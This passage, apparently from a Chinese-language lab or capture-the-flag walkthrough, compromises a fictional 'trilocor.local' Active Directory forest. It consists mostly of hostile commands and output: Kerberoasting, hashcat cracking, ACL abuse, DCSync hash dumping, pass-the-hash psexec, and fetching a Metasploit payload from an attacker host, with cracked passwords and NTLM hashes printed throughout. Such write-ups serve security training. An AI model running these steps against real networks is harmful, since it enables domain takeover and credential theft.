$krb5tgs$23$*ksalinas$TRILOCOR.LOCAL$trilocor.local/ksalinas*$286c1b92de8fffb2cc71d6e9ba30aa83$b61acb3bb009e0420e158dddf996e335363a4ce120171184e2f246ec0c34654ed749405b59e6a211cd334cee1f63855c532c073d71d6721fdcd21bcba95d6df01cbe89f421954f9bfa7db7a0509ce1bf6fb030d05e6acc95c32b167012540a86b4255c0a29bd138e6c94b12563e77b1900826b466fca682fb9452841c2f6d6b0604e6d2eebc4174de629e52d4a515c05124d7525fba2cacf609e220ce5b2cf8a0371e8fadf194bb02be18993375e095c194e2841030fb13179d60b4524ee1a06392eb8d32b5dd6df585b73f95e1cc4dc44b0d0dde2f06848c5d93fd1acfd3d4616c2d262ed40a5dbeccfd63eeee34d0624bcaf2189b3eb7d7b7e07f7247aeba7bc90100688e1bfb9137c547b401743c85bf8729e3b0ba94dacecd9a789ea402c7975bdb7249fef8c9ffa2059c44658146c80f10ea0b449ea6932511ab0403d4dd66d185e9c70ffdf4b5a6a3e0da28c1c0163d97ffeb188640364d07d03057a71fc4087667c878aa511e4dd153658097acab2da763f1e0e6b0c297349fbb9f74ebf8d638331c270d7ca4a726e02907e0b45c1b9e6d7829722fbe25eef3450f11c0c2ca504b874e1f5598bb4824306675073716c353b5755c1e8548e996897bed685b73bdcee3b2b7ed0ba7e135ecdf38de04a9c07e1cf7f32d06bbe4b0ef9e3132429c5c0a4cbb9aeecab16f355053f488c9d9efb7df820973bb00681340bd5c0486deaadf6a71aee739f9ece180f8072f71670574375d14acc3f3d35ecb9b40b8e8dee4c7a77ec9c00e45e0310967e5d015c7a7645163cfda64f110ce0ed8a17be981fa8b827138c382e50abddac5e667d58c2c19058c6f02a038f6e97fd1b36096606ce0990fcdfcada6b5915e0cf7190e5ef5f312d807118e2a8e89d861ff05b6121304d88cb6f4fd5ec077582a10bc7b1861daa1144dfd366dc9fe6e9ef5482ab757df7a2d6fdffd42ea1965f9896c9f26b199f0f37189818081f4e223406a10fa1cc3c9ab3df6af6fa4c5368aa24f35455db65caeaf4f4eed7edb58c44d65cb73267ca2db642845251b64c03a8c6e4a79460fe14edfd9205bc91a2365228a53d6f53b71b950a6bcff52b9c19c149fc9a3626b715e25fe7fc87071a3c6036ac733c72c4f957d110ac2b6765df1d6142339835c28783889f907ab3d3d4afb8a66698cca568a0621331a252f65fd5397f201947805be4899706e6e4b5290a9db630f4d74646ba2652dd5a1104e5fcd411507f153583b7913bd7ec69a5467d79476537be2f52fb3c6a9377cfe36ece25c4503f11476531d6c8541b670cff8660017869fc33d6bc09bedd3b9f218793097b0189dfa88451f19bf8dce74f1e97aff8ccc623df32788f6015f6dc05b84c27527a75c54838695e7c0716414f80dbd4137ef166803ec610f54ee8e0a3615ffccc9f0948bc8400204956768a39a5e975778383125a66fee368e4a8f8acf4d2de:atm@#5 $krb5tgs$23$*sqldev$TRILOCOR.LOCAL$trilocor.local/sqldev*$1b90fa31a0978dd8606d54a0dd048507$f1093f3333b584686a281ff64dc1c1c46e47abf525cadf3b822dd69c84c4b6cbcf06960e73169afffc71ed1cc225405d4a304ba34199359d2a312d8c009ea6efb96b23cf80da3b47c247a6fa7fda1e9234157232a221b275f416f579a2e3c4d2599d1fd446c2153d836524279d911bdfddf8aa3e3baa92729e5e9f6c4c0c846be547769c80d1e105164652377c86d52bdafabea069041836bb008b23322ce2d0da782b42febc5733e9671410a48b6822468ff306670a02816d26043f0e9d41be67b7c40f0dbce40e03e220b02d58355362cc9e15e3ec2ca941eaa1f7cc82d1f8a161fdc4f6c7274992bac306f863e85b6970b1822911cfd86c8eebe2b0eabe6deb09e850a10b030d72002d6478b81eff16a0e3f29f5e21b2e4a436b431ac09a642c708d53ef7b50c116551cdc277ff530e575102896e4a3d29b670594b646aca2e273c4e996c5afc0615cee006bad6b9c5b8e7c99fdcf8c0486c17e015ba25be608f086bb177a2204822ec46877ac5c6ab657a603bc0e3de282c794ddc4a6617538e459b7cf207538e631c3e1e0e1a0d7ecc70cf0b2ffb6c1c6e348f4c6614f64aa8ac1aac02357609602718f5a125207862a83ae79fd1bc9e5c6eb845f1625cebd7e90b7198d0ac7ae3eeae760cecad7a51a27ff5d274133d57b52945d8e80ff0cddf05c0b96ff23fab634a3dcfe30a18f8399784779d3fe5b5e673e6b0cd72507dd1f629d4767c060e6646d31cc440c25d8a839778814f9ee2e0dd4a91ab20c8329cd3f1b7dad3a44ad47b3408b5f3888e1ea2544e8ceacdf33023abf52f6ed2477d94b5256dea25656ec1b0271e4996039505bee14332ae36204b1c0768b04d71e3a4d050762759f07a78a5c20c0236f4dc8e0a3bfc56f8c82e1cf4b818ea95db14f80ceb01b4fec7a5cee693ac35ed7bab29cd53662fd3318ce2b792574a64e47427f4dfe690585a6658d99ebb3041df7de32be942c4e3c14f6286d28197816b828e2abf7e77be66ca4753c1b67ad3a129bf547bffbafdc3a0e8a6a2e4d3ea6a4d283e2527eae259abfd1479825777521d4772d2a34d56fd7025139c9acb419cb18de9dcfc8b6d1a2c0a667bf0045504fdc26bc590cd4eda7c4810c1bed802c74354326f9e1cb6d6008fc5a2077a4bc0154b542c8d7e1d68a74dd30a1f3efdf56c49ea19c4df23297da3ecf375604359a7f6babaed1dc1f1dc63f1c6c2160dd60a64a05f00d58ad483d0b5acf08dfeb63ad3c5375ba2ae200dc0e12ba534bd6ef56abf3927219dfcdf5dc6568e35808ff1f996763b8789442e070c191eddb2d5dda4ba5e72f0a378300166cea3345b14aad0936ce7c5d196c4ddb7fe03279f406da40f68976553ac5776b32ebced91e05bb77c6972ff67c7b6e8247d4aa2ee44d80739e5baea7fb96cea379ac0f534d7f0d31d1f5f3be2c212b8e7487b5b1ad42a089eef092cfb07bea40171c278:1212developer $krb5tgs$23$*sapvc$TRILOCOR.LOCAL$trilocor.local/sapvc*$0416dfb7a662c9df8574c3e920c39f2d$7cfea09e8a93eb6e3811f937be9c9414e5ac4c8598b8e60817acc90f4c7e3b66063a04dfa433fd7e317044387bf39fc5a70d889db80b45208700a7eae1a1ab71e7a24f16c66e1ebc02104a3d37894563ca1bb3d0022d847eaa4c03dc713290a5796eb488907c167336490b2ab87f51f2666a5c2eab897c5c35fc77d77d99aba9a4addac570f2c8d74684ce0d9051d822662f2ae3842fa69b4773526dac5112e387f6578934da00aaca3ec956a11c25ddad5699aabb415ab1cef04250314dac56954aa2b9ae1bcbb942c7740ef199da1e4a09ea104137b922d24aae18cfd5619d249f16d4474f757f7b9ddcc7d4b9a258083afbebc1b8038fc47d8c4d1034448783ce7772fbdca7cab425f2509695781ac195248282fb02f6875405a8a4a28e94e1d891abb76fb81c734a4c156d6cf73e9b1a294957213155279ff3ec5db7c9dd97094488e55690557127362c2a7d083225f56796542a348cb2477e8528a310e968ea5563b5bdc351518f58a1332cce44af2389de23ed1d3468818679887a811246967ae799da1ab6deef25bd2c857c27cb882b983f86fe3c79672f2c7e729ecec6c5f8284648f5ac0646950c6754a132d82457430d8ef880ebb766244d2cd668b5bd3e4e0c161cc13a412452d78cbd55246e9e9492beec3a7eae4ea4a8a5a9b403e0685ff03b2f65a20cf1fd7dc1e46a84f806a24b631f0a3bdd8e1e07e2eb4568efaf5093c5d78f198e144f77be9530c8aec264f3c7ae673db95a6be1b84b0a0169f077adc6e2a661dc21fc78f9c9fea0ec1541476e6016905e8f3895ab94d8054df1485220fc2690cca03c72d1277666b07f80b0ff499b8bc5a4502223389fa0e05df3287d81dc81218c4e121c5bfa65be707402835f85369bb30727f8c27f39ca228e4e030fe10c3beb9ec71a5e3b1c04c928a854f35d54898099dab4985a492bf3a7fdce90f731c698f7c1f5b463936908512c74727ed9e59b632f8e34cb264ec3176c46a8707257177111b549d98965bb485a3c4cfaf6f26df0d5d4e793ca6828b342bf37ccad80bc23fa1ef5a6672b5b40ef569f1e4163c33725375ff8778d4701cd72f44375562836df6fc0b396411a18f861780432b8218b298e769973f33edb00a0053188780394313633f1c3b3899588b498561847889015a2c6cf3b7ee783d555d3856220f8426ab03c69b521b08ec38fe0f56a367588983ec8553570659c923ef0173b6522fc75e6a0a8aa161ca06a4fd7dee6d409697e47db3b2bfb8c10a760dbc39d87aed0416e1dd1e4123f808a9c46b22e00a0e8da0f69b7893a32e1983887999489ddab3a3f828735290e54ea3a4aaf483e12545f98b224acad892e77c4f54236fdb7ab14a30c80a5ac5c62cc5707032df5cc5cc0d631f1e5774c73784dee9ffa1f918b4f6c9ba49e170a3e978983a1b910619fc746887f63dd1e70f94eeb163be7f91aa4ee9a34:!qaz2wsx3edc Approaching final keyspace - workload adjusted. Session..........: hashcat Status...........: Exhausted Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP) Hash.Target......: ksalinas-kerberosating.hashes Time.Started.....: Tue Jan 21 06:08:05 2025 (2 mins, 25 secs) Time.Estimated...: Tue Jan 21 06:10:30 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 911.5 kH/s (0.31ms) @ Accel:256 Loops:1 Thr:1 Vec:4 Recovered........: 4/13 (30.77%) Digests (total), 4/13 (30.77%) Digests (new), 4/13 (30.77%) Salts Progress.........: 186477005/186477005 (100.00%) Rejected.........: 0/186477005 (0.00%) Restore.Point....: 14344385/14344385 (100.00%) Restore.Sub.#1...: Salt:12 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103] Hardware.Mon.#1..: Util: 83% Started: Tue Jan 21 06:07:55 2025 Stopped: Tue Jan 21 06:10:32 2025
Self 查询域中所有对象的 ACL,并筛选出与 ksalinas 域用户 SID 相关的权限条目。
1 2 $sid = Convert-NameToSid ksalinas Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
ActiveDirectoryRights: Self 表示这个 ACE 允许用户或组对自己执行某些操作
将 ksalinas 域用户添加到 MSSP CONNECT 组
1 2 3 $SecPassword = ConvertTo-SecureString 'atm@#5' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('trilocor\ksalinas', $SecPassword) Add-DomainGroupMember -Credential $Cred -Identity 'MSSP CONNECT' -Members 'ksalinas' -Verbose
FILESHARE ADMINIS 检索 MSSP CNNECT 组 Transitive Object Control
MSSP CNNECT 对 TIER I INFRASTRCUTURE 拥有 WiteOwner 权限, 可以修改 TIER I INFRASTRCUTURE 组的所有者TIER I INFRASTRCUTURE 对 FILESHARE ADMINIS拥有 GenericWrite 权限,可以直接修改组的成员身份FILESHARE ADMINIS 组可能对域共享服务器有管理权限
WiteOwner 修改 TIER I INFRASTRCUTURE 组的所有者为 ksalinas 域用户
1 2 3 $SecPassword = ConvertTo-SecureString 'atm@#5' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('trilocor\ksalinas', $SecPassword) Set-DomainObjectOwner -Credential $Cred -Identity "TIER I INFRASTRUCTURE" -OwnerIdentity ksalinas -Verbose
在 TIER I INFRASTRCUTURE 组中授予ksalinas 域用户自己完全控制权限
1 Add-DomainObjectAcl -Credential $Cred -TargetIdentity "TIER I INFRASTRUCTURE" -PrincipalIdentity ksalinas -Rights All -Verbose
然后就可以将 ksalinas 域用户添加到 TIER I INFRASTRUCTURE 组
1 Add-DomainGroupMember -Credential $Cred -Identity 'TIER I INFRASTRUCTURE' -Members 'ksalinas' -Verbose
验证 TIER I INFRASTRUCTURE 组的成员
1 Get-DomainGroupMember -Identit 'TIER I INFRASTRUCTURE'
GenericWrite 将 ksalinas 域用户添加到 FILESHARE ADMINS 组
1 2 3 $SecPassword = ConvertTo-SecureString 'atm@#5' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('trilocor\ksalinas', $SecPassword) Add-DomainGroupMember -Credential $Cred -Identity 'FILESHARE ADMINS' -Members 'ksalinas' -Verbose
查看 FILESHARE ADMINIS 组的成员
1 Get-DomainGroupMember -Identit 'FILESHARE ADMINS'
SMB Share 再次枚举 SMB shares,发现 Department Shares 多了一个 Write 权限
在 \Department/ Shares\IT\Pricate\IT_BACKUP0207202\ 下,找个一个 Backup 文件 Trilocor_backup_03072022.vc
网络延迟太大,挂载到 WEB-NIX01 上,再起一个 HTTP 服务来进行文件传输
1 2 3 4 5 sudo mkdir -p /mnt/DC01/'Department Shares' sudo mount -t cifs //172.16.139.3/'Department Shares' /mnt/DC01/'Department Shares' -o username=ksalinas,password='atm@#5' cd /mnt/DC01/Department\ Shares/IT/Private/IT_BACKUP02072022 python3 -m http.server 2025
Trilocor_backup_03072022.vc 文件是 VeraCrypt 文件,使用 hashcat 尝试破解
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 $ hashcat -m 13751 Trilocor_backup_03072022.vc /usr/share/wordlists/rockyou.txt <SNIP> Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 Trilocor_backup_03072022.vc:qazwsx Session..........: hashcat Status...........: Cracked Hash.Mode........: 13751 (VeraCrypt SHA256 + XTS 512 bit (legacy)) Hash.Target......: Trilocor_backup_03072022.vc Time.Started.....: Tue Jan 21 12:14:25 2025 (1 min, 15 secs) Time.Estimated...: Tue Jan 21 12:15:40 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 10 H/s (6.16ms) @ Accel:256 Loops:250 Thr:1 Vec:4 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 768/14344385 (0.01%) Rejected.........: 0/768 (0.00%) Restore.Point....: 512/14344385 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:499750-499999 Candidate.Engine.: Device Generator Candidates.#1....: hockey -> james1 Hardware.Mon.#1..: Util: 96% Started: Tue Jan 21 12:13:58 2025 Stopped: Tue Jan 21 12:15:41 2025
WS01 机器的桌面有一个 VeraCrypt 软件,将 Trilocor_backup_03072022.vc 文件传到 WS01 机器
1 iwr http://172.16.139.10:2222/Trilocor_backup_03072022.vc -o Trilocor_backup_03072022.vc
选择此文件后,在选择任意一个 Drive ,然后再点击左下载的 Mount,然后输入破解出的密码
加载的磁盘 Z:/Private 中 trilocor_svc_vault.psafe3 文件扩展名突出,下载
trilocor_svc_vault.psafe3 文件是 Password Safe 软件的加密密码数据库文件
使用 hashcat 破解其密码
1 2 3 $ hashcat -h | grep 'Password Safe' 9000 | Password Safe v2 | Password Manager 5200 | Password Safe v3 | Password Manager
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 $ hashcat -m 5200 trilocor_svc_vault.psafe3 /usr/share/wordlists/rockyou.txt <SNIP> Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 trilocor_svc_vault.psafe3:thevault! Session..........: hashcat Status...........: Cracked Hash.Mode........: 5200 (Password Safe v3) Hash.Target......: trilocor_svc_vault.psafe3 Time.Started.....: Tue Jan 21 12:33:48 2025 (5 mins, 19 secs) Time.Estimated...: Tue Jan 21 12:39:07 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 10300 H/s (9.62ms) @ Accel:256 Loops:512 Thr:1 Vec:4 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 3244032/14344385 (22.62%) Rejected.........: 0/3244032 (0.00%) Restore.Point....: 3243520/14344385 (22.61%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2049 Candidate.Engine.: Device Generator Candidates.#1....: theview2007 -> thetriggerman Hardware.Mon.#1..: Util: 98% Started: Tue Jan 21 12:33:39 2025 Stopped: Tue Jan 21 12:39:08 2025
或
1 2 pwsafe2john trilocor_svc_vault.psafe3 > psafe3.hash john --w=/usr/share/wordlists/rockyou.txt psafe3.hash
然后下载 pwsafe 软件
1 2 3 wget https://github.com/pwsafe/pwsafe/releases/download/1.20.0/passwordsafe-debian12-1.20-amd64.deb sudo apt install -f sudo dpkg -i passwordsafe-debian12-1.20-amd64.deb
选中对象后,点击菜单栏的 Password 复制密码
获得了5组凭证
1 2 3 4 5 svc_mssql:mssqladm svc_sql:Sup3rPr0d4cti0NS3rv3r svc_ipm:calvin svc_azc:Sup3rPr0d4ctioNs3rv3r svc_trilocorsync:Synchronicity_21
DCSync 检索 Find Shortest Paths to Domain Admins ,发现 svc_trilocorsync 域用户具有 WriteDacl 权限,此权限可以更改访问控制列表 (ACL),包括为自己或其他用户授予额外的权限(例如 DCSync)
WriteDacl 授予 svc_trilocorsync 域用户自身 DCSync 权限
1 2 3 $SecPassword = ConvertTo-SecureString 'Synchronicity_21' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('trilocor\svc_trilocorsync', $SecPassword) Add-ObjectAcl -TargetDomain "trilocor.local" -PrincipalIdentity svc_trilocorsync -Rights DCSync -Verbose
DCSync 使用 impacket-secretsdump 工具执行 DCSync
1 2 3 4 5 6 7 8 9 10 11 12 13 14 $ impacket-secretsdump trilocor/svc_trilocorsync:Synchronicity_21@172.16.139.3 -just-dc -outputfile trilocor-dcsync Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:716ee2e3322df8be443de416ca20154f::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f15e59fe4d6812b54e265d9a48354848::: trilocor.local\avazquez:1724:aad3b435b51404eeaad3b435b51404ee:762cbc5ea2edfca03767427b2f2a909f::: trilocor.local\pfalcon:1725:aad3b435b51404eeaad3b435b51404ee:f8e656de86b8b13244e7c879d8177539::: trilocor.local\fanthony:1726:aad3b435b51404eeaad3b435b51404ee:9827f62cf27fe221b4e89f7519a2092a::: trilocor.local\wdillard:1727:aad3b435b51404eeaad3b435b51404ee:69ada25bbb693f9a85cd5f176948b0d5::: <SNIP>
使用 evil-winrm 工具连接到 DC01 机器
Interface
还可以开启 RDP,使用 Lazgent 工具进行数据窃取,只是此系统版本没有桌面
1 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Domain Trusts 使用 impacket psexec 工具连接,获得一个完整的环境,并在其 Shell 中上传 MSF payload 文件
1 2 3 impacket-psexec administrator@172.16.139.3 --hashes :716ee2e3322df8be443de416ca20154f iwr http://172.16.139.10:2222/xx.exe
转到 MSF 以获取更稳定的 Shell
枚举域信任
1 2 Import-Module .\PowerView.ps1 Get-DomainTrust
该命令显示域之间的信任关系信息,表明 trilocor.local 与 trilocorai.local 之间存在双向的森林传递信任关系
查看具有委派权限的对象
1 Get-DomainObject -LDAPFilter "(&(objectClass=user)(|(userAccountControl:1.2.840.113556.1.4.803:=524288)(msDS-AllowedToDelegateTo=*)))"
DC01$ 是计算机账户,且具有 TRUSTED_FOR_DELEGATION 属性,这意味着它有无约束委派权限。
查询 trilocorai.local 域用有 SPN 的账户
上传 Rubeus.exe 工具,执行 kerberoasting 攻击
1 iwr http://172.16.139.10:2222/Rubeus.exe
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 PS C:\Users\Administrator\Documents> .\Rubeus.exe kerberoast /domain:trilocorai.local /user:svc_datakeeper /nowrap .\Rubeus.exe kerberoast /domain:trilocorai.local /user:svc_datakeeper /nowrap ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.3.2 [*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Target User : svc_datakeeper [*] Target Domain : trilocorai.local [*] Searching path 'LDAP://DC02.trilocorai.local/DC=trilocorai,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=svc_datakeeper)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' [*] Total kerberoastable users : 1 [*] SamAccountName : svc_datakeeper [*] DistinguishedName : CN=svc_datakeeper,CN=Users,DC=trilocorai,DC=local [*] ServicePrincipalName : datakeeper/admin01.trilocorai.local:80 [*] PwdLastSet : 7/26/2022 7:09:36 AM [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash : $krb5tgs$23$*svc_datakeeper$trilocorai.local$datakeeper/admin01.trilocorai.local:80@trilocorai.local*$A5648791750ACD2988DF5859BF279FEF$BD4148E209EDEDDABF8579684AA16408C7F117B320D11291C6A00189C530FD8788279A5E2F0D94B4340E091E1C6925DC8C5AD91A59981A22C0A6C52BF01E1DE30DF4BD4F015B2E16F10A955B98F1406D0556FF3DA6CEE58C78740B39DA9727BF811901494C17E22677AC582BBF1BE1FDA1CB0B99CE9E5889F2BF241E3D0334C640A75F469D6D5CA0E73F840F063112DE31CE2A651456681D569BFB6866877D9877F75F8BC464F874578FF7EC060BA2C32E05095C961E9B6862EEBE27B5031994DE924D9477C95562343AF758EB02183CD870BE62FBC3773FC33D9694192B55A5851F766387811DBDF7E492F11C735B243127B47FAFDE1F3F589FD6E2E6ECE132CE0E3311CC767FCC6E4F179DAF7BCEF8EAE39252598699A97136A8F5A14D1F6DB49486CB9B5551CC9EB150C31FF425C6C69DF974A173EC2C186AE2049BD9B1ED765049FC4A5402BE214A5E2A9F04C945A10C4325FC26FAD309CFC02EBC4C040981E7AC4AC33D06DFF7D3C66D113FFCFB2CD47051CB49CD9CF6D5DCBC8C39662D629519B33D125A587EB95B98C9102DC99565EFDB3F9D495C9853823D1AAAFDE45E7C5CF1EADDB8D2C59611E0BDF52F64B768B174125F1CC90B911CB9ABDF204FEB749E3A5332B922DCCCB2165DDEC4D806B6C6AA2DF9545CD881FF27F4C96238455E0A4856BF56531431899B50B31B8055185B7580F37D79C899C60DBF8285971046047BEDAB2A6BA8DB8D565B7B119EA890D6F28FDCC752ADF2F952A8F9E147BD3FCA8D8A297EB4AF1F822BC426EE28C0FD38249C427D9260F6B09C62D046AC3A0F708C6765200241CF6A017C51E228EFB7E0D8F7849EBC742B1503861B2E7DA336EBBCD68DD22A9C29C8B7BA6BA7D0BEAE9ECE9A878FA53A823290534CF8BC2B4079E62D6AF381FBF6336061EA2ABA06A7C264104F752965B4753F6CAF79CCA4C8906DBD55AF6055628B5C38B9402C2D6E1BB059CB164978A87CED82C9E2281AC9EEEE76EEB610264572C7A40F02C272E473414C8DDD11F34CC679EA699F3DF5BF89F6E8EC78D79CFD4EF2267802ED53F028B94AF3225BB7351EEAD31242CA04A3F888CA154CFFD0AC50B932B8CD69E6018085F9D9B1DD4CA95C2307556473D06637891D80978CEE0F8731A9147E1F0B809797B73202A3A9D8CC47F607101722AE55AE0E8FE668304A8866598CAF8686CE73E05AA82864BE8740238284B2996CE068BF0EC91539BF5DB6BCAB1B663B455800C1ACECC4154F6B538300671F60A610A30139EC6BF83211272D21349DEE2ED08D02FE320F0BBCC6716F564C4C7674AD7A2E7F90150A0EF08481E2EC12C84277D5F10D734729FA68925BDC6CE9CDCFA1E3477476435EBBA16DFE1CFF378540ED6ED327D7800A78112525A9055DA03B3C1178B8194D817C6B498B62C00C3E89DEB5720124CA9C51E54FBA087C43FF648E5EFBCAE40C99DBFFB0B12AB3C4CC3879DD0573B985267E964673D5902C9B6FD8C9F0B0402B72214BC7B5B6FBBA595183E6D47989C00EEEC8FEF1233C55E2491BF128484F263DCF1B7C622EFA
使用 hashcat 工具破解
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 $ hashcat -m 13100 svc_datakeeper.hash /usr/share/wordlists/rockyou.txt hashcat (v6.2.6) starting OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project] ==================================================================================================================================== * Device #1: cpu--0x000, 1437/2938 MB (512 MB allocatable), 2MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 0 MB Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 Cracking performance lower than expected? * Append -O to the commandline. This lowers the maximum supported password/salt length (usually down to 32). * Append -w 3 to the commandline. This can cause your screen to lag. * Append -S to the commandline. This has a drastic speed impact but can be better for specific attacks. Typical scenarios are a small wordlist but a large ruleset. * Update your backend API runtime / driver the right way: https://hashcat.net/faq/wrongdriver * Create more work items to make use of your parallelization power: https://hashcat.net/faq/morework $krb5tgs$23$*svc_datakeeper$trilocorai.local$datakeeper/admin01.trilocorai.local:80@trilocorai.local*$a5648791750acd2988df5859bf279fef$bd4148e209ededdabf8579684aa16408c7f117b320d11291c6a00189c530fd8788279a5e2f0d94b4340e091e1c6925dc8c5ad91a59981a22c0a6c52bf01e1de30df4bd4f015b2e16f10a955b98f1406d0556ff3da6cee58c78740b39da9727bf811901494c17e22677ac582bbf1be1fda1cb0b99ce9e5889f2bf241e3d0334c640a75f469d6d5ca0e73f840f063112de31ce2a651456681d569bfb6866877d9877f75f8bc464f874578ff7ec060ba2c32e05095c961e9b6862eebe27b5031994de924d9477c95562343af758eb02183cd870be62fbc3773fc33d9694192b55a5851f766387811dbdf7e492f11c735b243127b47fafde1f3f589fd6e2e6ece132ce0e3311cc767fcc6e4f179daf7bcef8eae39252598699a97136a8f5a14d1f6db49486cb9b5551cc9eb150c31ff425c6c69df974a173ec2c186ae2049bd9b1ed765049fc4a5402be214a5e2a9f04c945a10c4325fc26fad309cfc02ebc4c040981e7ac4ac33d06dff7d3c66d113ffcfb2cd47051cb49cd9cf6d5dcbc8c39662d629519b33d125a587eb95b98c9102dc99565efdb3f9d495c9853823d1aaafde45e7c5cf1eaddb8d2c59611e0bdf52f64b768b174125f1cc90b911cb9abdf204feb749e3a5332b922dcccb2165ddec4d806b6c6aa2df9545cd881ff27f4c96238455e0a4856bf56531431899b50b31b8055185b7580f37d79c899c60dbf8285971046047bedab2a6ba8db8d565b7b119ea890d6f28fdcc752adf2f952a8f9e147bd3fca8d8a297eb4af1f822bc426ee28c0fd38249c427d9260f6b09c62d046ac3a0f708c6765200241cf6a017c51e228efb7e0d8f7849ebc742b1503861b2e7da336ebbcd68dd22a9c29c8b7ba6ba7d0beae9ece9a878fa53a823290534cf8bc2b4079e62d6af381fbf6336061ea2aba06a7c264104f752965b4753f6caf79cca4c8906dbd55af6055628b5c38b9402c2d6e1bb059cb164978a87ced82c9e2281ac9eeee76eeb610264572c7a40f02c272e473414c8ddd11f34cc679ea699f3df5bf89f6e8ec78d79cfd4ef2267802ed53f028b94af3225bb7351eead31242ca04a3f888ca154cffd0ac50b932b8cd69e6018085f9d9b1dd4ca95c2307556473d06637891d80978cee0f8731a9147e1f0b809797b73202a3a9d8cc47f607101722ae55ae0e8fe668304a8866598caf8686ce73e05aa82864be8740238284b2996ce068bf0ec91539bf5db6bcab1b663b455800c1acecc4154f6b538300671f60a610a30139ec6bf83211272d21349dee2ed08d02fe320f0bbcc6716f564c4c7674ad7a2e7f90150a0ef08481e2ec12c84277d5f10d734729fa68925bdc6ce9cdcfa1e3477476435ebba16dfe1cff378540ed6ed327d7800a78112525a9055da03b3c1178b8194d817c6b498b62c00c3e89deb5720124ca9c51e54fba087c43ff648e5efbcae40c99dbffb0b12ab3c4cc3879dd0573b985267e964673d5902c9b6fd8c9f0b0402b72214bc7b5b6fbba595183e6d47989c00eeec8fef1233c55e2491bf128484f263dcf1b7c622efa:data@system Session..........: hashcat Status...........: Cracked Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP) Hash.Target......: $krb5tgs$23$*svc_datakeeper$trilocorai.local$datake...622efa Time.Started.....: Thu Jan 23 14:33:25 2025 (7 secs) Time.Estimated...: Thu Jan 23 14:33:32 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 1172.6 kH/s (0.34ms) @ Accel:256 Loops:1 Thr:1 Vec:4 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 8761344/14344385 (61.08%) Rejected.........: 0/8761344 (0.00%) Restore.Point....: 8760832/14344385 (61.07%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator 